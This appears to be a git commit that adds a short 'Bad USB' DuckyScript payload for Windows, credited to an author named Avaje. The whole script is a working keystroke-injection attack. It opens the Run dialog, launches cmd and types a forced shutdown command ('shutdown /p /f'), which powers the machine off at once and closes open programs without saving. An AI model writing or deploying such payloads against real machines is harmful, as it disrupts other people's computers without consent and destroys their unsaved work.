Added windows Bad USB script

This commit is contained in:
2023-06-24 03:04:57 -07:00
parent f58f44aece
commit 1c87a9024e
+14
View File
@@ -0,0 +1,14 @@
REM Author: Avaje
REM Description: Shuts down windows automatically
REM Version: 1.0
REM Category: Execution
DELAY 750
WINDOWS d
DELAY 300
WINDOWS r
DELAY 300
STRING cmd
ENTER
DELAY 1500
STRING shutdown /p /f
ENTER